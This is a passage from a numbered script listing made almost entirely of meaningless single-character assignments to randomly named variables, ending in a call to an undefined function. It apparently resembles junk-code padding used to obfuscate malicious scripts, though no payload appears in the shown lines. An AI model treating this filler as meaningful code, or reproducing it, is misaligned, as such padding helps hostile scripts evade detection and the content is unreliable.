794 | yyrlms = "n"; | |
795 | yyrlms = "m"; | |
796 | yyrlms = "Q"; | |
797 | yyrlms = "X"; | |
798 | yyrlms = "i"; | |
799 | yyrlms = "X"; | |
800 | yyrlms = "h"; | |
801 | esvgqp = "J"; | |
802 | esvgqp = "c"; | |
803 | ppempmvsm = "Z"; | |
804 | ppempmvsm = "K"; | |
805 | ppempmvsm = "D"; | |
806 | ppempmvsm = "d"; | |
807 | ppempmvsm = "U"; | |
808 | ppempmvsm = "m"; | |
809 | ppempmvsm = "x"; | |
810 | ppempmvsm = "J"; | |
811 | ppempmvsm = "S"; | |
812 | ppempmvsm = "o"; | |
813 | ppempmvsm = "N"; | |
814 | ppempmvsm = "t"; | |
815 | ppempmvsm = "w"; | |
816 | ppempmvsm = "b"; | |
817 | ppempmvsm = "K"; | |
818 | obdnzrhak = "U"; | |
819 | obdnzrhak = "Q"; | |
820 | obdnzrhak = "J"; | |
821 | obdnzrhak = "i"; | |
822 | obdnzrhak = "m"; | |
823 | obdnzrhak = "u"; | |
824 | obdnzrhak = "u"; | |
825 | obdnzrhak = "B"; | |
826 | obdnzrhak = "g"; | |
827 | obdnzrhak = "P"; | |
828 | obdnzrhak = "l"; | |
829 | obdnzrhak = "W"; | |
830 | obdnzrhak = "c"; | |
831 | obdnzrhak = "g"; | |
832 | obdnzrhak = "x"; | |
833 | obdnzrhak = "E"; | |
834 | obdnzrhak = "E"; | |
835 | obdnzrhak = "V"; | |
836 | obdnzrhak = "B"; | |
837 | obdnzrhak = "q"; | |
838 | obdnzrhak = "D"; | |
839 | obdnzrhak = "R"; | |
840 | kmmxtdl = "o"; | |
841 | kmmxtdl = "g"; | |
842 | kmmxtdl = "G"; | |
843 | kmmxtdl = "n"; | |
844 | kmmxtdl = "U"; | |
845 | kmmxtdl = "D"; | |
846 | kmmxtdl = "M"; | |
847 | kmmxtdl = "h"; | |
848 | kmmxtdl = "z"; | |
849 | kmmxtdl = "Z"; | |
850 | kmmxtdl = "L"; | |
851 | kmmxtdl = "G"; | |
852 | kmmxtdl = "s"; | |
853 | kmmxtdl = "u"; | |
854 | kmmxtdl = "J"; | |
855 | kmmxtdl = "m"; | |
856 | kmmxtdl = "y"; | |
857 | kmmxtdl = "W"; | |
858 | kmmxtdl = "z"; | |
859 | kmmxtdl = "z"; | |
860 | kmmxtdl = "c"; | |
861 | kmmxtdl = "4"; | |
862 | ldkqap = "c"; | |
863 | ldkqap = "W"; | |
864 | ldkqap = "c"; | |
865 | ldkqap = "A"; | |
866 | ldkqap = "P"; | |
867 | ldkqap = "L"; | |
868 | ldkqap = "K"; | |
869 | ldkqap = "t"; | |
870 | ldkqap = "N"; | |
871 | annngcf = "O"; | |
872 | annngcf = "F"; | |
873 | annngcf = "l"; | |
874 | znyfsfw = "R"; | |
875 | znyfsfw = "C"; | |
876 | znyfsfw = "e"; | |
877 | znyfsfw = "Y"; | |
878 | znyfsfw = "u"; | |
879 | znyfsfw = "L"; | |
880 | znyfsfw = "C"; | |
881 | znyfsfw = "Q"; | |
882 | znyfsfw = "j"; | |
883 | znyfsfw = "O"; | |
884 | znyfsfw = "n"; | |
885 | znyfsfw = "P"; | |
886 | znyfsfw = "x"; | |
887 | znyfsfw = "L"; | |
888 | znyfsfw = "q"; | |
889 | znyfsfw = "t"; | |
890 | znyfsfw = "Y"; | |
891 | znyfsfw = "r"; | |
892 | znyfsfw = "Q"; | |
893 | znyfsfw = "q"; | |
894 | znyfsfw = "Q"; | |
895 | znyfsfw = "o"; | |
896 | znyfsfw = "b"; | |
897 | znyfsfw = "t"; | |
898 | znyfsfw = "o"; | |
899 | znyfsfw = "C"; | |
900 | xjyxbrhc = "q"; | |
901 | xjyxbrhc = "O"; | |
902 | mnntmjrng = "R"; | |
903 | mnntmjrng = "C"; | |
904 | mnntmjrng = "B"; | |
905 | mnntmjrng = "q"; | |
906 | mnntmjrng = "h"; | |
907 | mnntmjrng = "W"; | |
908 | mnntmjrng = "C"; | |
909 | mnntmjrng = "x"; | |
910 | mnntmjrng = "V"; | |
911 | mnntmjrng = "J"; | |
912 | mnntmjrng = "e"; | |
913 | mnntmjrng = "o"; | |
914 | mnntmjrng = "h"; | |
915 | mnntmjrng = "b"; | |
916 | mnntmjrng = "J"; | |
917 | mnntmjrng = "_"; | |
918 | ceyaolrro = "g"; | |
919 | ceyaolrro = "X"; | |
920 | ceyaolrro = "o"; | |
921 | ceyaolrro = "E"; | |
922 | ceyaolrro = "H"; | |
923 | ceyaolrro = "E"; | |
924 | ceyaolrro = "e"; | |
925 | ceyaolrro = "x"; | |
926 | ceyaolrro = "M"; | |
927 | ceyaolrro = "U"; | |
928 | ceyaolrro = "P"; | |
929 | ceyaolrro = "r"; | |
930 | ceyaolrro = "l"; | |
931 | ceyaolrro = "u"; | |
932 | ceyaolrro = "g"; | |
933 | ceyaolrro = "P"; | |
934 | ceyaolrro = "y"; | |
935 | ceyaolrro = "k"; | |
936 | ceyaolrro = "E"; | |
937 | ceyaolrro = "O"; | |
938 | ceyaolrro = "y"; | |
939 | ceyaolrro = "A"; | |
940 | ceyaolrro = "K"; | |
941 | ceyaolrro = "m"; | |
942 | ceyaolrro = "p"; | |
943 | ceyaolrro = "o"; | |
944 | ceyaolrro = "k"; | |
945 | ceyaolrro = "a"; | |
946 | ceyaolrro = "f"; | |
947 | ceyaolrro = "V"; | |
948 | ceyaolrro = "Y"; | |
949 | ceyaolrro = "Q"; | |
950 | xloxf = "T"; | |
951 | xloxf = "R"; | |
952 | xloxf = "o"; | |
953 | xloxf = "X"; | |
954 | xloxf = "s"; | |
955 | xloxf = "K"; | |
956 | xloxf = "D"; | |
957 | xloxf = "m"; | |
958 | xloxf = "E"; | |
959 | xloxf = "b"; | |
960 | xloxf = "M"; | |
961 | xloxf = "P"; | |
962 | rbkcxe = "T"; | |
963 | rbkcxe = "g"; | |
964 | rbkcxe = "k"; | |
965 | rbkcxe = "O"; | |
966 | rbkcxe = "o"; | |
967 | rbkcxe = "v"; | |
968 | naglv = "U"; | |
969 | naglv = "v"; | |
970 | naglv = "/"; | |
971 | pbnjuddww = "r"; | |
972 | pbnjuddww = "U"; | |
973 | pbnjuddww = "q"; | |
974 | pbnjuddww = "k"; | |
975 | pbnjuddww = "C"; | |
976 | pbnjuddww = "p"; | |
977 | pbnjuddww = "l"; | |
978 | pbnjuddww = "x"; | |
979 | pbnjuddww = "S"; | |
980 | pbnjuddww = "Q"; | |
981 | pbnjuddww = "W"; | |
982 | pbnjuddww = "X"; | |
983 | pbnjuddww = "q"; | |
984 | pbnjuddww = "V"; | |
985 | pbnjuddww = "G"; | |
986 | pbnjuddww = "x"; | |
987 | pbnjuddww = "v"; | |
988 | pbnjuddww = "C"; | |
989 | pbnjuddww = "I"; | |
990 | pbnjuddww = "R"; | |
991 | pbnjuddww = "J"; | |
992 | pbnjuddww = "T"; | |
993 | pbnjuddww = "p"; | |
994 | pbnjuddww = "l"; | |
995 | pbnjuddww = "j"; | |
996 | pbnjuddww = "K"; | |
997 | pbnjuddww = "D"; | |
998 | pbnjuddww = "i"; | |
999 | pbnjuddww = "C"; | |
1000 | pbnjuddww = "h"; | |
1001 | pbnjuddww = "k"; | |
1002 | pbnjuddww = "J"; | |
1003 | pbnjuddww = "W"; | |
1004 | pbnjuddww = "v"; | |
1005 | pbnjuddww = "v"; | |
1006 | pbnjuddww = "Y"; | |
1007 | yhpuwit = "a"; | |
1008 | yhpuwit = "q"; | |
1009 | yhpuwit = "g"; | |
1010 | yhpuwit = "S"; | |
1011 | yhpuwit = "R"; | |
1012 | yhpuwit = "g"; | |
1013 | yhpuwit = "s"; | |
1014 | yhpuwit = "P"; | |
1015 | yhpuwit = "D"; | |
1016 | yhpuwit = "K"; | |
1017 | yhpuwit = "b"; | |
1018 | yhpuwit = "k"; | |
1019 | yhpuwit = "p"; | |
1020 | yhpuwit = "e"; | |
1021 | yhpuwit = "m"; | |
1022 | yhpuwit = "y"; | |
1023 | yhpuwit = "r"; | |
1024 | yhpuwit = "Z"; | |
1025 | yhpuwit = "y"; | |
1026 | yhpuwit = "e"; | |
1027 | yhpuwit = "p"; | |
1028 | yhpuwit = "I"; | |
1029 | yhpuwit = "S"; | |
1030 | yhpuwit = "e"; | |
1031 | yhpuwit = "d"; | |
1032 | yhpuwit = "k"; | |
1033 | yhpuwit = "J"; | |
1034 | yhpuwit = "T"; | |
1035 | yhpuwit = "z"; | |
1036 | yhpuwit = "h"; | |
1037 | yhpuwit = "r"; | |
1038 | yhpuwit = "N"; | |
1039 | yhpuwit = "j"; | |
1040 | yhpuwit = "y"; | |
1041 | yhpuwit = "k"; | |
1042 | yhpuwit = "X"; | |
1043 | yhpuwit = "a"; | |
1044 | yhpuwit = "S"; | |
1045 | ajhgkxw = "M"; | |
1046 | ajhgkxw = "E"; | |
1047 | ajhgkxw = "H"; | |
1048 | ajhgkxw = "U"; | |
1049 | ajhgkxw = "X"; | |
1050 | ajhgkxw = "z"; | |
1051 | ajhgkxw = "r"; | |
1052 | ajhgkxw = "C"; | |
1053 | ajhgkxw = "z"; | |
1054 | ajhgkxw = "A"; | |
1055 | ajhgkxw = "R"; | |
1056 | ajhgkxw = "z"; | |
1057 | ajhgkxw = "E"; | |
1058 | ajhgkxw = "Q"; | |
1059 | ajhgkxw = "n"; | |
1060 | ajhgkxw = "F"; | |
1061 | ajhgkxw = "X"; | |
1062 | ajhgkxw = "P"; | |
1063 | ajhgkxw = "F"; | |
1064 | ajhgkxw = "Q"; | |
1065 | ajhgkxw = "s"; | |
1066 | dheamgd = "X"; | |
1067 | dheamgd = "C"; | |
1068 | dheamgd = "n"; | |
1069 | dheamgd = "x"; | |
1070 | dheamgd = "D"; | |
1071 | dheamgd = "s"; | |
1072 | dheamgd = "I"; | |
1073 | dheamgd = "l"; | |
1074 | dheamgd = "c"; | |
1075 | dheamgd = "t"; | |
1076 | dheamgd = "S"; | |
1077 | dheamgd = "i"; | |
1078 | dheamgd = "G"; | |
1079 | dheamgd = "c"; | |
1080 | dheamgd = "X"; | |
1081 | dheamgd = "R"; | |
1082 | dheamgd = "e"; | |
1083 | dheamgd = "K"; | |
1084 | dheamgd = "V"; | |
1085 | dheamgd = "e"; | |
1086 | dheamgd = "n"; | |
1087 | dheamgd = "O"; | |
1088 | dheamgd = "P"; | |
1089 | dheamgd = "Z"; | |
1090 | dheamgd = "w"; | |
1091 | dheamgd = "B"; | |
1092 | dheamgd = "W"; | |
1093 | iwfqnevm = "o"; | |
1094 | iwfqnevm = "O"; | |
1095 | iwfqnevm = "o"; | |
1096 | iwfqnevm = "o"; | |
1097 | rvsgg = "m"; | |
1098 | rvsgg = "k"; | |
1099 | rvsgg = "Z"; | |
1100 | rvsgg = "u"; | |
1101 | rvsgg = "y"; | |
1102 | rvsgg = "M"; | |
1103 | rvsgg = "T"; | |
1104 | rvsgg = "X"; | |
1105 | rvsgg = "Y"; | |
1106 | rvsgg = "u"; | |
1107 | rvsgg = "d"; | |
1108 | rvsgg = "G"; | |
1109 | rvsgg = "r"; | |
1110 | rvsgg = "g"; | |
1111 | rvsgg = "Q"; | |
1112 | rvsgg = "Y"; | |
1113 | rvsgg = "o"; | |
1114 | rvsgg = "k"; | |
1115 | yuaewfni = "f"; | |
1116 | yuaewfni = "c"; | |
1117 | yuaewfni = "F"; | |
1118 | yuaewfni = "C"; | |
1119 | yuaewfni = "z"; | |
1120 | yuaewfni = "u"; | |
1121 | yuaewfni = "d"; | |
1122 | yuaewfni = "k"; | |
1123 | yuaewfni = "m"; | |
1124 | yuaewfni = "N"; | |
1125 | yuaewfni = "u"; | |
1126 | yuaewfni = "g"; | |
1127 | yuaewfni = "g"; | |
1128 | yuaewfni = "P"; | |
1129 | yuaewfni = "v"; | |
1130 | yuaewfni = "q"; | |
1131 | yuaewfni = "X"; | |
1132 | yuaewfni = "y"; | |
1133 | yuaewfni = "T"; | |
1134 | yuaewfni = "j"; | |
1135 | yuaewfni = "Y"; | |
1136 | yuaewfni = "K"; | |
1137 | yuaewfni = "B"; | |
1138 | yuaewfni = "J"; | |
1139 | yuaewfni = "F"; | |
1140 | yuaewfni = "s"; | |
1141 | yuaewfni = "h"; | |
1142 | yuaewfni = "b"; | |
1143 | yuaewfni = "U"; | |
1144 | yuaewfni = "i"; | |
1145 | inxoqdq = "y"; | |
1146 | inxoqdq = "z"; | |
1147 | inxoqdq = "f"; | |
1148 | inxoqdq = "z"; | |
1149 | inxoqdq = "V"; | |
1150 | inxoqdq = "V"; | |
1151 | inxoqdq = "b"; | |
1152 | inxoqdq = "A"; | |
1153 | inxoqdq = "T"; | |
1154 | inxoqdq = "W"; | |
1155 | inxoqdq = "f"; | |
1156 | inxoqdq = "t"; | |
1157 | inxoqdq = "E"; | |
1158 | inxoqdq = "s"; | |
1159 | inxoqdq = "Y"; | |
1160 | inxoqdq = "U"; | |
1161 | inxoqdq = "w"; | |
1162 | inxoqdq = "t"; | |
1163 | inxoqdq = "k"; | |
1164 | inxoqdq = "G"; | |
1165 | inxoqdq = "s"; | |
1166 | inxoqdq = "J"; | |
1167 | inxoqdq = "8"; | |
1168 | ajoxptl = "T"; | |
1169 | ajoxptl = "M"; | |
1170 | ajoxptl = "K"; | |
1171 | ajoxptl = "w"; | |
1172 | ajoxptl = "s"; | |
1173 | ajoxptl = "c"; | |
1174 | ajoxptl = "y"; | |
1175 | ajoxptl = "L"; | |
1176 | ajoxptl = "H"; | |
1177 | ajoxptl = "n"; | |
1178 | ajoxptl = "d"; | |
1179 | ajoxptl = "y"; | |
1180 | ajoxptl = "F"; | |
1181 | ajoxptl = "v"; | |
1182 | ajoxptl = "p"; | |
1183 | ajoxptl = "v"; | |
1184 | ajoxptl = "j"; | |
1185 | tsnmgkrj = "G"; | |
1186 | tsnmgkrj = "x"; | |
1187 | tsnmgkrj = "i"; | |
1188 | tsnmgkrj = "g"; | |
1189 | lcsqvfai = "d"; | |
1190 | lcsqvfai = "g"; | |
1191 | lcsqvfai = "O"; | |
1192 | lcsqvfai = "s"; | |
1193 | lcsqvfai = "w"; | |
1194 | lcsqvfai = "m"; | |
1195 | lcsqvfai = "v"; | |
1196 | lcsqvfai = "X"; | |
1197 | lcsqvfai = "b"; | |
1198 | lcsqvfai = "g"; | |
1199 | lcsqvfai = "c"; | |
1200 | lcsqvfai = "U"; | |
1201 | lcsqvfai = "o"; | |
1202 | lcsqvfai = "N"; | |
1203 | lcsqvfai = "H"; | |
1204 | xoadbmxqu = "m"; | |
1205 | wgdydi = "c"; | |
1206 | wgdydi = "j"; | |
1207 | wgdydi = "B"; | |
1208 | wgdydi = "S"; | |
1209 | wgdydi = "B"; | |
1210 | wgdydi = "Q"; | |
1211 | wgdydi = "S"; | |
1212 | wgdydi = "g"; | |
1213 | wgdydi = "P"; | |
1214 | wgdydi = "Z"; | |
1215 | wgdydi = "P"; | |
1216 | wgdydi = "N"; | |
1217 | wgdydi = "E"; | |
1218 | wgdydi = "b"; | |
1219 | wgdydi = "r"; | |
1220 | wgdydi = "r"; | |
1221 | wgdydi = "H"; | |
1222 | wgdydi = "u"; | |
1223 | wgdydi = "X"; | |
1224 | wgdydi = "p"; | |
1225 | uwsftvsr = "q"; | |
1226 | uwsftvsr = "s"; | |
1227 | uwsftvsr = "D"; | |
1228 | uwsftvsr = "Q"; | |
1229 | uwsftvsr = "O"; | |
1230 | uwsftvsr = "h"; | |
1231 | uwsftvsr = "l"; | |
1232 | uwsftvsr = "t"; | |
1233 | uwsftvsr = "I"; | |
1234 | uwsftvsr = "y"; | |
1235 | uwsftvsr = "Q"; | |
1236 | uwsftvsr = "f"; | |
1237 | uwsftvsr = "O"; | |
1238 | uwsftvsr = "Z"; | |
1239 | uwsftvsr = "F"; | |
1240 | uwsftvsr = "l"; | |
1241 | uwsftvsr = "S"; | |
1242 | uwsftvsr = "y"; | |
1243 | uwsftvsr = "h"; | |
1244 | uwsftvsr = "G"; | |
1245 | uwsftvsr = "e"; | |
1246 | uwsftvsr = "p"; | |
1247 | uwsftvsr = "S"; | |
1248 | uwsftvsr = "w"; | |
1249 | uwsftvsr = "I"; | |
1250 | mpmzkvy = "Y"; | |
1251 | mpmzkvy = "i"; | |
1252 | mpmzkvy = "U"; | |
1253 | mpmzkvy = "h"; | |
1254 | mpmzkvy = "f"; | |
1255 | mpmzkvy = "j"; | |
1256 | mpmzkvy = "j"; | |
1257 | mpmzkvy = "u"; | |
1258 | mpmzkvy = "H"; | |
1259 | mpmzkvy = "A"; | |
1260 | mpmzkvy = "b"; | |
1261 | mpmzkvy = "b"; | |
1262 | mpmzkvy = "C"; | |
1263 | mpmzkvy = "x"; | |
1264 | mpmzkvy = "w"; | |
1265 | mpmzkvy = "y"; | |
1266 | mpmzkvy = "K"; | |
1267 | mpmzkvy = "h"; | |
1268 | mpmzkvy = "u"; | |
1269 | mpmzkvy = "P"; | |
1270 | mpmzkvy = "G"; | |
1271 | mpmzkvy = "E"; | |
1272 | uhjrc = "a"; | |
1273 | uhjrc = "C"; | |
1274 | uhjrc = "B"; | |
1275 | uhjrc = "p"; | |
1276 | uhjrc = "n"; | |
1277 | uhjrc = "H"; | |
1278 | uhjrc = "w"; | |
1279 | uhjrc = "b"; | |
1280 | uhjrc = "R"; | |
1281 | uhjrc = "L"; | |
1282 | uhjrc = "s"; | |
1283 | uhjrc = "w"; | |
1284 | uhjrc = "Y"; | |
1285 | uhjrc = "I"; | |
1286 | uhjrc = "p"; | |
1287 | uhjrc = "e"; | |
1288 | uhjrc = "p"; | |
1289 | uhjrc = "h"; | |
1290 | uhjrc = "w"; | |
1291 | uhjrc = "b"; | |
1292 | uhjrc = "z"; | |
1293 | uhjrc = "C"; | |
1294 | uhjrc = "w"; | |
1295 | uhjrc = "o"; | |
1296 | uhjrc = "t"; | |
1297 | uhjrc = "Z"; | |
1298 | uhjrc = "X"; | |
1299 | uhjrc = "p"; | |
1300 | uhjrc = "E"; | |
1301 | uhjrc = "v"; | |
1302 | uhjrc = "Y"; | |
1303 | uhjrc = "Y"; | |
1304 | uhjrc = "Q"; | |
1305 | uhjrc = "M"; | |
1306 | uhjrc = "a"; | |
1307 | uhjrc = "n"; | |
1308 | uhjrc = "s"; | |
1309 | uhjrc = "&"; | |
1310 | wlunvo = "b"; | |
1311 | wlunvo = "g"; | |
1312 | wlunvo = "a"; | |
1313 | wlunvo = "W"; | |
1314 | wlunvo = "l"; | |
1315 | wlunvo = "O"; | |
1316 | wlunvo = "w"; | |
1317 | wlunvo = "t"; | |
1318 | wlunvo = "G"; | |
1319 | wlunvo = "Q"; | |
1320 | wlunvo = "G"; | |
1321 | wlunvo = "t"; | |
1322 | wlunvo = "I"; | |
1323 | wlunvo = "J"; | |
1324 | wlunvo = "S"; | |
1325 | wlunvo = "O"; | |
1326 | wlunvo = "r"; | |
1327 | wlunvo = "p"; | |
1328 | wlunvo = "N"; | |
1329 | wlunvo = "o"; | |
1330 | wlunvo = "b"; | |
1331 | wlunvo = "\\"; | |
1332 | irqnct = "A"; | |
1333 | irqnct = "C"; | |
1334 | irqnct = "J"; | |
1335 | irqnct = "J"; | |
1336 | irqnct = "h"; | |
1337 | irqnct = "f"; | |
1338 | irqnct = "k"; | |
1339 | irqnct = "y"; | |
1340 | irqnct = "E"; | |
1341 | irqnct = "Z"; | |
1342 | irqnct = "I"; | |
1343 | irqnct = "x"; | |
1344 | irqnct = "a"; | |
1345 | irqnct = "R"; | |
1346 | irqnct = "E"; | |
1347 | irqnct = "y"; | |
1348 | irqnct = "N"; | |
1349 | irqnct = "N"; | |
1350 | irqnct = "I"; | |
1351 | irqnct = "Z"; | |
1352 | irqnct = "t"; | |
1353 | irqnct = "d"; | |
1354 | irqnct = "V"; | |
1355 | irqnct = "o"; | |
1356 | irqnct = "U"; | |
1357 | irqnct = "m"; | |
1358 | irqnct = "j"; | |
1359 | irqnct = "z"; | |
1360 | irqnct = "X"; | |
1361 | irqnct = "C"; | |
1362 | irqnct = "z"; | |
1363 | irqnct = "q"; | |
1364 | irqnct = "z"; | |
1365 | irqnct = "Z"; | |
1366 | irqnct = "X"; | |
1367 | irqnct = "S"; | |
1368 | irqnct = "F"; | |
1369 | irqnct = "F"; | |
1370 | irqnct = "j"; | |
1371 | irqnct = "G"; | |
1372 | irqnct = "n"; | |
1373 | xzrmvvsi ( ); |
|